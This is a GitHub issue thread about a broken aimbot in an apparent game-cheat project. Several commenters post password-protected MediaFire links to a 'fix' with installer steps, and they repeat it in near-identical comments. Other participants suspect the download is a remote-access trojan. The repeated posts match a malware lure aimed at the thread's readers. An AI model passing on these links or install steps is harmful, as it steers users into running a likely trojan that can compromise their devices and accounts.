### ISSUE TITLE
aimbot 

### ISSUE THREAD

**Issue by vampzz1311** [waxnet/NetWare#105]
aimbot is broken not work

**Comment by Zordon1337** [comment]
> aimbot is broken not work 

config issue

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zordon1337** [comment]
> to fix your trouble try download this fix, i see it in another issue,
> https://app.mediafire.com/3ag3jpquii3of
> password: changeme
> when you installing, you need to place a check in install to path and select "gcc."

Sounds like an rat to me

**Comment by vampzz1311** [comment]
> > to fix your trouble try download this fix, i see it in another issue,
> > https://app.mediafire.com/3ag3jpquii3of
> > password: changeme
> > when you installing, you need to place a check in install to path and select "gcc."
> 
> Sounds like an rat to me

yeah i think thats a rat

**Comment by vampzz1311** [comment]
i fixed it tho

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
